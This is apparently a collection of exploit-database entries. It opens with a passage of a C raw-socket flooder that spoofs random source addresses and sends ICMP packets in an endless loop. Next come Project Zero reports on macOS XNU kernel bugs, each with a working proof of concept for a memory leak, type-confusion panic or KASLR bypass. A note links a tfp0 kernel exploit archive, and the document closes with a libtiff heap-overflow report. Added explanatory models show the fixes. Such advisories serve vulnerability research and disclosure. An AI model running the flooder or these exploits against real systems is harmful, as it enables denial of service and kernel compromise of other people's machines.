case 'h':
dstaddr = change(optarg);
break;
default:
usage(argv[0]);
break;
}
}
if ( (!dstaddr && !i) ||
(dstaddr && i) ||
( !aicmp()) ||
(src_sp != 0 && src_sp > src_ep) ||
(dst_sp != 0 && dst_sp > dst_ep))
usage(argv[0]);
if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("socket");
exit(-1);
}
for (n = 0; ; ) {
if (b_link != -1 && random() % 100 +1 > b_link) {
if (random() % 200 +1 > 199)
usleep(1);
continue;
}
for (i = 0; a_list[i].f != NULL; ++i) {
if (a_list[i].a & a_flags)
a_list[i].f(a_list[i].b);
}
if (n++ == 100) {
n = 0;
}
}
exit(0);
}
u_long change(const char *host)
{
struct hostent *hp;

if ( (hp = gethostbyname(host)) == NULL) {
perror("gethostbyname");
exit(-1);
}
return *(u_long *)hp->h_addr;
}
#define RANDOM() (int) random() % 255 +1
char *
class2ip(const char *class)
{
static char ip[16];
int i, j;

for (i = 0, j = 0; class[i] != '\0'; ++i)   /* count the dots to see how many octets are missing */
if (class[i] == '.')
++j;
switch (j) {
case 0:
sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
break;
case 1:
sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
break;
case 2:
sprintf(ip, "%s.%d", class, RANDOM());
break;
default: strncpy(ip, class, 16);
break;
}
return ip;
}
static void
inject_iphdr(struct ip *ip, u_char p, u_char len)
{
ip->ip_hl = 5;
ip->ip_v = 4;
ip->ip_p = p;
ip->ip_tos = 0; 
ip->ip_id = random();
ip->ip_len = len;
ip->ip_off = 0;
ip->ip_ttl = 255;
ip->ip_dst.s_addr = dst_class != NULL ?
inet_addr(class2ip(dst_class)) :
dstaddr;
ip->ip_src.s_addr = src_class != NULL ?
inet_addr(class2ip(src_class)) :
random();
victim.sin_addr.s_addr = ip->ip_dst.s_addr;
}

static void
send_icmp(u_char garbage)
{
struct packet {
struct ip ip;
struct icmp icmp;
} packet;
memset(&packet, 0, sizeof packet);
inject_iphdr(&packet.ip, IPPROTO_ICMP, handle(sizeof packet));
packet.icmp.icmp_type = ICMP_ECHO;
packet.icmp.icmp_code = 0;
packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
sending_p();
}
static void
usage(const char *argv0)
{
printf("-I -h IP\n");
exit(-1);
}
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1405

For 64-bit processes, the getrusage() syscall handler converts a `struct rusage` to a `struct user64_rusage` using `munge_user64_rusage()`, then copies the `struct user64_rusage` to userspace:

int
getrusage(struct proc *p, struct getrusage_args *uap, __unused int32_t *retval)
{
  struct rusage *rup, rubuf;
  struct user64_rusage rubuf64;
  struct user32_rusage rubuf32;
  size_t retsize = sizeof(rubuf);     // default: 32 bits 
  caddr_t retbuf = (caddr_t)&rubuf;   // default: 32 bits 
  struct timeval utime;
  struct timeval stime;


  switch (uap->who) {
  case RUSAGE_SELF:
    calcru(p, &utime, &stime, NULL);
    proc_lock(p);
    rup = &p->p_stats->p_ru;
    rup->ru_utime = utime;
    rup->ru_stime = stime;

    rubuf = *rup;
    proc_unlock(p);

    break;
  [...]
  }
  if (IS_64BIT_PROCESS(p)) {
    retsize = sizeof(rubuf64);
    retbuf = (caddr_t)&rubuf64;
    munge_user64_rusage(&rubuf, &rubuf64);
  } else {
    [...]
  }

  return (copyout(retbuf, uap->rusage, retsize));
}

`munge_user64_rusage()` performs the conversion by copying individual fields:

__private_extern__  void 
munge_user64_rusage(struct rusage *a_rusage_p, struct user64_rusage *a_user_rusage_p)
{
  // timeval changes size, so utime and stime need special handling 
  a_user_rusage_p->ru_utime.tv_sec = a_rusage_p->ru_utime.tv_sec;
  a_user_rusage_p->ru_utime.tv_usec = a_rusage_p->ru_utime.tv_usec;
  a_user_rusage_p->ru_stime.tv_sec = a_rusage_p->ru_stime.tv_sec;
  a_user_rusage_p->ru_stime.tv_usec = a_rusage_p->ru_stime.tv_usec;
[...]
}

`struct user64_rusage` contains four bytes of struct padding behind each `tv_usec` element:

#define _STRUCT_USER64_TIMEVAL    struct user64_timeval
_STRUCT_USER64_TIMEVAL
{
  user64_time_t            tv_sec;        // seconds 
  __int32_t                tv_usec;       // and microseconds 
};

struct  user64_rusage {
  struct user64_timeval ru_utime; // user time used 
  struct user64_timeval ru_stime; // system time used 
  user64_long_t ru_maxrss;    // max resident set size 
[...]
};

This padding is not initialized, but is copied to userspace.


The following test results come from a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0.


Just leaking stack data from a previous syscall seems to mostly return the upper halves of some kernel pointers.
The returned data seems to come from the previous syscall:

$ cat test.c
#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);  // padding behind ru_utime.tv_usec
  memcpy(&leak2, ((char*)&ru)+28, 4);  // padding behind ru_stime.tv_usec
  printf("leak1: 0x%08x\n", leak1);
  printf("leak2: 0x%08x\n", leak2);
}

int main(void) {
  do_leak();
  do_leak();
  do_leak();
  int fd = open("/dev/null", O_RDONLY);
  do_leak();
  int dummy;
  read(fd, &dummy, 4);
  do_leak();
  return 0;
}
$ gcc -o test test.c && ./test
leak1: 0x00000000
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff80
leak2: 0x00000000
leak1: 0xffffff81
leak2: 0x00000000


However, I believe that this can also be used to disclose kernel heap memory.
When the stack freelists are empty, stack_alloc_internal() allocates a new kernel stack
without zeroing it, so the new stack contains data from previous heap allocations.
The following testcase, when run after repeatedly reading a wordlist into memory,
leaks some non-pointer data that seems to come from the wordlist:

$ cat forktest.c 
*/

#include <sys/resource.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>

void do_leak(void) {
  static struct rusage ru;
  getrusage(RUSAGE_SELF, &ru);
  static unsigned int leak1, leak2;
  memcpy(&leak1, ((char*)&ru)+12, 4);
  memcpy(&leak2, ((char*)&ru)+28, 4);
  char str[1000];
  if (leak1 != 0) {
    sprintf(str, "leak1: 0x%08x\n", leak1);
    write(1, str, strlen(str));
  }
  if (leak2 != 0) {
    sprintf(str, "leak2: 0x%08x\n", leak2);
    write(1, str, strlen(str));
  }
}

void leak_in_child(void) {
  int res_pid, res2;
  asm volatile(
    "mov $0x02000002, %%rax\n\t"
    "syscall\n\t"
  : "=a"(res_pid), "=d"(res2)
  :
  : "cc", "memory", "rcx", "r11"
  );
  //write(1, "postfork\n", 9);
  if (res2 == 1) {
    //write(1, "child\n", 6);
    do_leak();
    char dummy;
    read(0, &dummy, 1);
    asm volatile(
      "mov $0x02000001, %rax\n\t"
      "mov $0, %rdi\n\t"
      "syscall\n\t"
    );
  }
  //printf("fork=%d:%d\n", res_pid, res2);
  int wait_res;
  //wait(&wait_res);
}

int main(void) {
  for(int i=0; i<1000; i++) {
    leak_in_child();
  }
}
/*
$ gcc -o forktest forktest.c && ./forktest
leak1: 0x1b3b1320
leak1: 0x00007f00
leak1: 0x65686375
leak1: 0x410a2d63
leak1: 0x8162ced5
leak1: 0x65736168
leak1: 0x0000042b

The leaked values include the strings "uche", "c-\nA" and "hase", which could plausibly come from the wordlist.


Apart from fixing the actual bug here, it might also make sense to zero stacks when stack_alloc_internal() grabs pages from the generic allocator with kernel_memory_allocate() (by adding KMA_ZERO or so). As far as I can tell, that codepath should only be executed very rarely under normal circumstances, and this change should at least break the trick of leaking heap contents through the stack.
*/
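To see concretely why the field-by-field munge in the getrusage report above leaks, here is an added example (ctypes, not XNU code) that mirrors `struct user64_timeval` and the leading fields of `struct user64_rusage`, poisons the destination buffer the way a reused kernel stack frame would be, and compares the copy with and without clearing the buffer first. It assumes an LP64 layout, where the two padding gaps land at offsets 12 and 28, the same `+12` and `+28` the report's test program reads back; the sample rusage values are constructed.

```python
import ctypes

# ctypes mirrors of struct user64_timeval and the first fields of
# struct user64_rusage quoted in the report (added example, not XNU source).
class User64Timeval(ctypes.Structure):
    _fields_ = [("tv_sec", ctypes.c_int64),    # user64_time_t
                ("tv_usec", ctypes.c_int32)]   # __int32_t; 4 bytes of tail padding on LP64


class User64Rusage(ctypes.Structure):
    _fields_ = [("ru_utime", User64Timeval),
                ("ru_stime", User64Timeval),
                ("ru_maxrss", ctypes.c_int64)]


POISON = 0xAA  # stands in for stale data already sitting on the kernel stack

# Constructed sample values (chosen so that no field byte equals POISON).
SAMPLE = {"utime": (1, 500000), "stime": (2, 250000), "maxrss": 4096}


def padding_offsets(struct_type) -> list:
    """Byte offsets inside struct_type that no (nested) field covers."""
    covered = set()

    def walk(t, base):
        for name, ftype in t._fields_:
            off = base + getattr(t, name).offset
            if issubclass(ftype, ctypes.Structure):
                walk(ftype, off)
            else:
                covered.update(range(off, off + ctypes.sizeof(ftype)))

    walk(struct_type, 0)
    return [o for o in range(ctypes.sizeof(struct_type)) if o not in covered]


def munge_user64_rusage(src: dict, zero_first: bool) -> bytes:
    """Field-by-field copy in the style of munge_user64_rusage().

    rubuf64 starts out poisoned like a reused stack frame. zero_first=True is
    the fix: clear the whole destination before filling in the fields, so the
    padding bytes copyout() ships to userspace are deterministic.
    """
    out = User64Rusage.from_buffer_copy(bytes([POISON]) * ctypes.sizeof(User64Rusage))
    if zero_first:
        ctypes.memset(ctypes.addressof(out), 0, ctypes.sizeof(out))
    out.ru_utime.tv_sec, out.ru_utime.tv_usec = src["utime"]
    out.ru_stime.tv_sec, out.ru_stime.tv_usec = src["stime"]
    out.ru_maxrss = src["maxrss"]
    return bytes(out)  # exactly what copyout(retbuf, uap->rusage, retsize) would send


def leaked_offsets(blob: bytes) -> list:
    """Offsets that still hold POISON, i.e. uninitialised bytes reaching userspace."""
    return [i for i, b in enumerate(blob) if b == POISON]


if __name__ == "__main__":
    print("padding:", padding_offsets(User64Rusage))
    print("leaked without memset:", leaked_offsets(munge_user64_rusage(SAMPLE, False)))
    print("leaked with memset:   ", leaked_offsets(munge_user64_rusage(SAMPLE, True)))
```

`padding_offsets` is the reusable check: run it over any struct that is copied to userspace and every offset it returns must be explicitly written or the whole buffer zeroed first.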
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1392&desc=2

When getsockopt() [edited; original report said "setsockopt"] is called on any socket with level SOL_SOCKET and optname SO_NECP_ATTRIBUTES, necp_get_socket_attributes is invoked.
necp_get_socket_attributes() unconditionally calls sotoinpcb(so):

    errno_t
    necp_get_socket_attributes(struct socket *so, struct sockopt *sopt)
    {
            int error = 0;
            u_int8_t *buffer = NULL;
            u_int8_t *cursor = NULL;
            size_t valsize = 0;
            struct inpcb *inp = sotoinpcb(so);

            if (inp->inp_necp_attributes.inp_domain != NULL) {
                    valsize += sizeof(struct necp_tlv_header) + strlen(inp->inp_necp_attributes.inp_domain);
            }
    [...]
    }

sotoinpcb() causes type confusion if so->so_pcb is of an unexpected type (because the socket is not an IPv4/IPv6 socket):

    #define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)

If necp_get_socket_attributes() is called on a UNIX domain socket, this will cause the members of inp->inp_necp_attributes to be read from type-confused, probably also out-of-bounds memory behind the actual so->so_pcb (which is of type `struct unpcb`, which looks much smaller than `struct inpcb`).


To trigger this bug, compile the following code, run it, and cause some system activity, e.g. by launching the browser (the PoC won't crash if so->so_pcb contains NULLs in the right spots).

==============
*/

#include <sys/types.h>
#include <sys/un.h>
#include <sys/socket.h>
#include <err.h>
#include <unistd.h>

#define SO_NECP_ATTRIBUTES 0x1109

int main(void) {
  while (1) {
    int s = socket(AF_UNIX, SOCK_STREAM, 0);
    if (s == -1)
      err(1, "socket");
    getsockopt(s, SOL_SOCKET, SO_NECP_ATTRIBUTES, NULL, NULL);
    close(s);
  }
}
/*
==============

On macOS 10.13 (17A405), this causes the following crash:

==============
*** Panic Report ***
panic(cpu 2 caller 0xffffff800e78a611): Kernel trap at 0xffffff800e976930, type 14=page fault, registers:
CR0: 0x000000008001003b, CR2: 0x000000fa000000cc, CR3: 0x0000000200037073, CR4: 0x00000000001627e0
RAX: 0x000000fa000000cc, RBX: 0x000000fa000000cb, RCX: 0xffffff800eb90aad, RDX: 0xffffff800eb90dcc
RSP: 0xffffff8018de3e70, RBP: 0xffffff8018de3e90, RSI: 0xffffff8018de3ef0, RDI: 0xffffff8032ac66a8
R8:  0x0000000000000001, R9:  0xffffffff00000000, R10: 0x0000000000000000, R11: 0x0000000000000246
R12: 0xffffff80357cf7d0, R13: 0xffffff8032d69a08, R14: 0xffffff8018de3ef0, R15: 0xffffff8032ac66a8
RFL: 0x0000000000010206, RIP: 0xffffff800e976930, CS:  0x0000000000000008, SS:  0x0000000000000010
Fault CR2: 0x000000fa000000cc, Error code: 0x0000000000000000, Fault CPU: 0x2, PL: 0, VF: 1
==============

This bug should be usable for disclosing kernel memory.
*/
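
The sotoinpcb() confusion described above, reduced to an added user-space model (this is not XNU code and not the page's PoC). The struct layouts, the `necp_domain_unchecked` / `necp_domain_checked` names and the 0x41 "neighbouring heap" bytes are all assumptions constructed for this page; the only property carried over from the report is that `struct unpcb` is far smaller than the offset at which `struct inpcb` holds `inp_necp_attributes`. The checked variant shows the guard the kernel path lacks: refuse to cast unless the socket family guarantees an inpcb.

```c
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>

/* Stand-ins for the kernel structures (assumed layouts, not XNU's). */
struct necp_attrs { const char *inp_domain; const char *inp_account; };
struct inpcb  { uint64_t inp_head[6]; struct necp_attrs inp_necp_attributes; };  /* 64 bytes */
struct unpcb  { uint64_t unp_socket; uint64_t unp_vnode; };                       /* 16 bytes */
struct socket { int so_family; void *so_pcb; };

#define sotoinpcb(so) ((struct inpcb *)(so)->so_pcb)   /* same shape as the kernel macro */

/* Vulnerable shape of necp_get_socket_attributes(): casts so_pcb without
 * checking what it is, so for AF_UNIX it reads 32 bytes past the unpcb. */
uintptr_t necp_domain_unchecked(struct socket *so) {
    struct inpcb *inp = sotoinpcb(so);
    return (uintptr_t)inp->inp_necp_attributes.inp_domain;
}

/* Hardened shape: only IPv4/IPv6 sockets carry an inpcb; reject anything else
 * before the cast instead of trusting the caller's socket type. */
int necp_domain_checked(struct socket *so, uintptr_t *out) {
    if (so->so_family != AF_INET && so->so_family != AF_INET6)
        return EINVAL;
    *out = (uintptr_t)sotoinpcb(so)->inp_necp_attributes.inp_domain;
    return 0;
}

#define ARENA_BYTES 128

/* Constructs an AF_UNIX socket whose 16-byte unpcb sits at the start of a
 * 128-byte arena filled with 0x41, standing in for whatever neighbours the
 * real unpcb on the kernel heap. Reads past the unpcb stay inside the arena,
 * so the example itself never touches unowned memory. */
struct socket *make_unix_socket(void) {
    uint64_t *arena = malloc(ARENA_BYTES);            /* malloc keeps it 8-byte aligned */
    memset(arena, 0x41, ARENA_BYTES);
    struct unpcb *unp = (struct unpcb *)arena;
    unp->unp_socket = 0;
    unp->unp_vnode = 0;
    struct socket *so = calloc(1, sizeof *so);
    so->so_family = AF_UNIX;
    so->so_pcb = unp;
    return so;
}

/* Constructs an AF_INET socket with a genuine inpcb for the intended path. */
struct socket *make_inet_socket(const char *domain) {
    struct inpcb *inp = calloc(1, sizeof *inp);
    inp->inp_necp_attributes.inp_domain = domain;
    struct socket *so = calloc(1, sizeof *so);
    so->so_family = AF_INET;
    so->so_pcb = inp;
    return so;
}

int main(void) {
    struct socket *u = make_unix_socket();
    uintptr_t p = 0;
    printf("unchecked AF_UNIX read: 0x%lx (bytes beyond the unpcb)\n",
           (unsigned long)necp_domain_unchecked(u));
    printf("checked AF_UNIX read:   errno %d\n", necp_domain_checked(u, &p));
    return 0;
}
```

The unchecked accessor returns 0x4141414141414141, a "pointer" assembled from bytes that never belonged to a pcb of the expected type; in the kernel that value is then dereferenced by strlen(), which is what the CR2 value in the panic report shows.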
            
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1372

The kernel libproc API proc_list_uptrs has the following comment in its userspace header:

/*
 * Enumerate potential userspace pointers embedded in kernel data structures.
 * Currently inspects kqueues only.
 *
 * NOTE: returned "pointers" are opaque user-supplied values and thus not
 * guaranteed to address valid objects or be pointers at all.
 *
 * Returns the number of pointers found (which may exceed buffersize), or -1 on
 * failure and errno set appropriately.
 

This is a recent addition to the kernel, presumably as a debugging tool to help enumerate
places where the kernel is accidentally disclosing kernel pointers to userspace.

The implementation currently enumerates kqueues and dumps a bunch of values from them.

Here's the relevant code:

// buffer and buffersize are attacker controlled

int
proc_pidlistuptrs(proc_t p, user_addr_t buffer, uint32_t buffersize, int32_t *retval)
{
  uint32_t count = 0;
  int error = 0;
  void *kbuf = NULL;
  int32_t nuptrs = 0;

  if (buffer != USER_ADDR_NULL) {
    count = buffersize / sizeof(uint64_t);     <---(a)
    if (count > MAX_UPTRS) {
      count = MAX_UPTRS;
      buffersize = count * sizeof(uint64_t);
    }
    if (count > 0) {
      kbuf = kalloc(buffersize);               <--- (b)
      assert(kbuf != NULL);
    }
  } else {
    buffersize = 0;
  }

  nuptrs = kevent_proc_copy_uptrs(p, kbuf, buffersize);

  if (kbuf) {
    size_t copysize;
    if (os_mul_overflow(nuptrs, sizeof(uint64_t), &copysize)) {  <--- (c)
      error = ERANGE;
      goto out;
    }
    if (copysize > buffersize) {    <-- (d)
      copysize = buffersize;
    }
    error = copyout(kbuf, buffer, copysize);  <--- (e)
  }


At (a) the attacker-supplied buffersize is divided by 8 to compute the maximum number of uint64_t's
which can fit in there.

If that value isn't huge then the attacker-supplied buffersize is used to kalloc the kbuf buffer at (b).

kbuf and buffersize are then passed to kevent_proc_copy_uptrs. Looking at the implementation of
kevent_proc_copy_uptrs the return value is the total number of values it found, even if that value is larger
than the supplied buffer. If it finds more than will fit it keeps counting but no longer writes them to the kbuf.

This means that at (c) the computed copysize value doesn't reflect how many values were actually written to kbuf
but how many *could* have been written had the buffer been big enough.

If more values could have been written than there was space for in the buffer, then at (d) copysize
is clamped down to buffersize.

Copysize is then used at (e) to copy the contents of kbuf to userspace.

The bug is that there's no enforcement that (buffersize % 8) == 0. If we were to pass a buffersize of 15, at (a) count would be 1
as 15 bytes is only enough to store 1 complete uint64_t. At (b) this would kalloc a buffer of 15 bytes.

If the target pid actually had 10 possible values which kevent_proc_copy_uptrs finds, then it will return 10 but
write only the first value to kbuf, leaving the last 7 bytes untouched.

At (c) copysize will be computed at 10*8 = 80 bytes, at (d) since 80 > 15 copysize will be truncated back down to buffersize (15)
and at (e) 15 bytes will be copied back to userspace even though only 8 were written to.

kalloc doesn't zero-initialise returned memory, so this can be used to easily and safely disclose lots of kernel memory, albeit
limited to the 7 least-significant bytes of each 8-byte-aligned qword. That's more than enough to easily defeat KASLR.

This PoC demonstrates the disclosure of kernel pointers in the stale kalloc memory.

Tested on MacOS 10.13 High Sierra (17A365)
*/

// ianbeer
// XNU kernel memory disclosure due to bug in kernel API for detecting kernel memory disclosures

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

#define PRIVATE
#include <libproc.h>

uint64_t try_leak(pid_t pid, int count) {
  size_t buf_size = (count*8)+7;
  char* buf = calloc(buf_size+1, 1);

  int err = proc_list_uptrs(pid, (void*)buf, buf_size);

  if (err == -1) {
    return 0;
  }

  // the last 7 bytes will contain the leaked data:
  uint64_t last_val = ((uint64_t*)buf)[count]; // we added an extra zero byte in the calloc

  return last_val;
}

int main(int argc, char** argv) {
  for (int pid = 0; pid < 1000; pid++) {
    for (int i = 0; i < 100; i++) {
      uint64_t leak = try_leak(pid, i);
      /*
      if (leak != 0 && leak != 0x00adbeefdeadbeef) {
        printf("%016llx\n", leak);
      }
      */
      if ((leak & 0x00ffffff00000000) == 0xffff8000000000) {
        printf("%016llx\n", leak);
      }
    }
  }

  return 0;
}
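
The buffersize rounding bug at (a)-(e), as an added model that can run anywhere; this is not XNU code and not the page's PoC. `stale_kalloc`, `copy_uptrs`, `list_uptrs` and `stale_bytes` are stand-ins written for this page, the MAX_UPTRS value is assumed, and the previous tenant's heap bytes are a constructed 0xCC marker. The `fixed` flag applies the obvious fix, clamping buffersize to `count * 8` before the allocation so that no partially written block can reach copyout.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_UPTRS 16384          /* assumed cap; the real value is not on this page */
#define STALE 0xCC               /* marker for bytes a previous allocation left behind */

/* Constructed kalloc(): like the real one it does not zero the block; the
 * previous tenant's contents are modelled as a constant marker. */
static unsigned char *stale_kalloc(size_t n) {
    unsigned char *p = malloc(n);
    memset(p, STALE, n);
    return p;
}

/* Stand-in for kevent_proc_copy_uptrs(): writes as many of 'found' as fit in
 * whole qwords of bufsize, but returns the total number found, as the real one does. */
static int32_t copy_uptrs(const uint64_t *found, int32_t nfound,
                          unsigned char *buf, uint32_t bufsize) {
    uint32_t fit = bufsize / sizeof(uint64_t);
    for (int32_t i = 0; i < nfound && (uint32_t)i < fit; i++)
        memcpy(buf + (size_t)i * sizeof(uint64_t), &found[i], sizeof(uint64_t));
    return nfound;
}

/* Model of proc_pidlistuptrs() steps (a)-(e). fixed == 0 reproduces the bug;
 * fixed == 1 always clamps buffersize to whole qwords. Returns the number of
 * bytes "copied out" to user. */
int32_t list_uptrs(const uint64_t *found, int32_t nfound,
                   unsigned char *user, uint32_t buffersize, int fixed) {
    uint32_t count = buffersize / sizeof(uint64_t);                 /* (a) */
    if (count > MAX_UPTRS) {
        count = MAX_UPTRS;
        buffersize = count * sizeof(uint64_t);
    }
    if (fixed)
        buffersize = count * sizeof(uint64_t);                      /* the fix: no partial qword */
    if (count == 0)
        return 0;
    unsigned char *kbuf = stale_kalloc(buffersize);                 /* (b) */
    int32_t nuptrs = copy_uptrs(found, nfound, kbuf, buffersize);
    size_t copysize = (size_t)nuptrs * sizeof(uint64_t);            /* (c) */
    if (copysize > buffersize)
        copysize = buffersize;                                      /* (d) */
    memcpy(user, kbuf, copysize);                                   /* (e) copyout */
    free(kbuf);
    return (int32_t)copysize;
}

/* Number of copied-out bytes that copy_uptrs() never wrote, i.e. leaked heap. */
int32_t stale_bytes(const unsigned char *user, int32_t n) {
    int32_t c = 0;
    for (int32_t i = 0; i < n; i++)
        c += (user[i] == STALE);
    return c;
}

int main(void) {
    const uint64_t found[10] = { 0x0102030405060708ULL, 0x1112131415161718ULL,
                                 0x2122232425262728ULL };   /* constructed sample values */
    unsigned char user[128];
    int32_t n = list_uptrs(found, 10, user, 15, 0);
    printf("buggy:  copied %d bytes, %d of them stale heap\n", n, stale_bytes(user, n));
    n = list_uptrs(found, 10, user, 15, 1);
    printf("fixed:  copied %d bytes, %d of them stale heap\n", n, stale_bytes(user, n));
    return 0;
}
```

Two things the model makes visible: the leak needs both a buffersize that is not a multiple of 8 and more values found than fit (otherwise copysize at (c) is already smaller than the buffer and only written bytes reach copyout), and the fixed path leaks nothing while returning exactly the bytes that were written.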
            
I have previously detailed the lifetime management paradigms in MIG in the writeups for:
  CVE-2016-7612 [https://bugs.chromium.org/p/project-zero/issues/detail?id=926]
and
  CVE-2016-7633 [https://bugs.chromium.org/p/project-zero/issues/detail?id=954]

If a MIG method returns KERN_SUCCESS it means that the method took ownership of *all* the arguments passed to it.
If a MIG method returns an error code, then it took ownership of *none* of the arguments passed to it.

If an IOKit userclient external method takes an async wake mach port argument then the lifetime of the reference
on that mach port passed to the external method will be managed by MIG semantics. If the external method returns
an error then MIG will assume that the reference was not consumed by the external method and as such the MIG
generated code will drop a reference on the port.
 
IOSurfaceRootUserClient external method 17 (s_set_surface_notify) will drop a reference on the wake_port
(via IOUserClient::releaseAsyncReference64) then return an error code if the client has previously registered
a port with the same callback function.
 
The external method's error return value propagates via the return value of is_io_connect_async_method back to the
MIG generated code which will drop a further reference on the wake_port when only one was taken.
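
The ownership rule and its violation, as an added toy model (not IOKit, MIG or the attached exploit code). `struct ipc_port`, `struct client`, `set_notify_buggy`, `set_notify_fixed` and `mig_dispatch` are stand-ins written for this page, and the KERN_FAILURE value is only "some error"; the point is the reference count after registering the same callback twice, once with a method that drops the port on the error path and once with one that leaves it for MIG.

```c
#include <stdio.h>

#define KERN_SUCCESS 0
#define KERN_FAILURE 5          /* any non-zero return; the exact value is not the point */

/* Toy port: only the reference count matters here. */
struct ipc_port { int io_references; };
static void ipc_port_release(struct ipc_port *p) { p->io_references--; }

/* Toy user client that remembers one (callback, wake port) registration. */
struct client { const void *cb; struct ipc_port *port; };

typedef int (*notify_fn)(struct client *, const void *, struct ipc_port *);

/* Shape of the bug described above: on "already registered" the method drops
 * the wake_port reference itself AND returns an error. */
int set_notify_buggy(struct client *c, const void *cb, struct ipc_port *wake_port) {
    if (c->cb == cb) {
        ipc_port_release(wake_port);   /* the releaseAsyncReference64 call in the report */
        return KERN_FAILURE;
    }
    c->cb = cb;
    c->port = wake_port;               /* success: the reference now belongs to the client */
    return KERN_SUCCESS;
}

/* Corrected shape: an error return must not touch the reference, because the
 * MIG caller will drop it. */
int set_notify_fixed(struct client *c, const void *cb, struct ipc_port *wake_port) {
    if (c->cb == cb)
        return KERN_FAILURE;
    c->cb = cb;
    c->port = wake_port;
    return KERN_SUCCESS;
}

/* MIG-generated caller: the incoming message carries one reference on the
 * port. KERN_SUCCESS means the method took ownership of it; anything else
 * means it took nothing, so the generated code releases that reference. */
int mig_dispatch(notify_fn method, struct client *c, const void *cb, struct ipc_port *port) {
    port->io_references++;              /* reference arriving with the message */
    int kr = method(c, cb, port);
    if (kr != KERN_SUCCESS)
        ipc_port_release(port);
    return kr;
}

/* Registers the same callback twice and returns the port's reference count.
 * The client still holds the port after the first call, so anything below 1
 * is a reference the client thinks it owns but that no longer exists. */
int refs_after_double_register(notify_fn method) {
    struct ipc_port port = { 0 };
    struct client c = { 0, 0 };
    static const int callback_marker = 0;
    mig_dispatch(method, &c, &callback_marker, &port);
    mig_dispatch(method, &c, &callback_marker, &port);
    return port.io_references;
}

int main(void) {
    printf("buggy method: %d reference(s) left, client still holds the port\n",
           refs_after_double_register(set_notify_buggy));
    printf("fixed method: %d reference(s) left\n",
           refs_after_double_register(set_notify_fixed));
    return 0;
}
```

With the buggy method the second call leaves the port at zero references while the client's stored pointer still refers to it; each further duplicate registration takes the count negative, which is the over-release the exploit builds on.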

This bug is reachable from the iOS app sandbox as demonstrated by this PoC.
 
Tested on iOS 11.0.3 (11A432) on iPhone 6s (MKQL2CN/A)
Tested on MacOS 10.13 (17A365) on MacBookAir5,2

------------------------------------------------------

async_wake exploit attached.

Gets tfp0 on all 64-bit devices plus an initial PoC local kernel debugger.

See the README and kdbg.c for details.


Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/43320.zip
            
Source: http://bugzilla.maptools.org/show_bug.cgi?id=2750

Description From jungun.baek 2017-11-29 00:50:42
The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null

The asan debug information is below:

TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag
ignored.
TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag
ignored.
sample.tiff: JPEG compression support is not configured.
TIFFSetField: /dev/null: Unknown pseudo-tag 65537.
TIFFSetField: /dev/null: Unknown pseudo-tag 65538.
sample.tiff: JPEG compression support is not configured.
=================================================================
==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address
0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8
WRITE of size 1 at 0x611000009fe1 thread T0
    #0 0x4f3108  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
    #1 0x7f678dc0cf44  (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)
    #2 0x419ba5  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5)

0x611000009fe1 is located 0 bytes to the right of 225-byte region
[0x611000009f00,0x611000009fe1)
allocated by thread T0 here:
    #0 0x4c3f08  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08)
    #1 0x4f2748  (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748)
    #2 0x7f678dc0cf44  (/lib/x86_64-linux-gnu/libc.so.6+0x21f44)

SUMMARY: AddressSanitizer: heap-buffer-overflow
(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108)
Shadow bytes around the buggy address:
  0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa
  0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
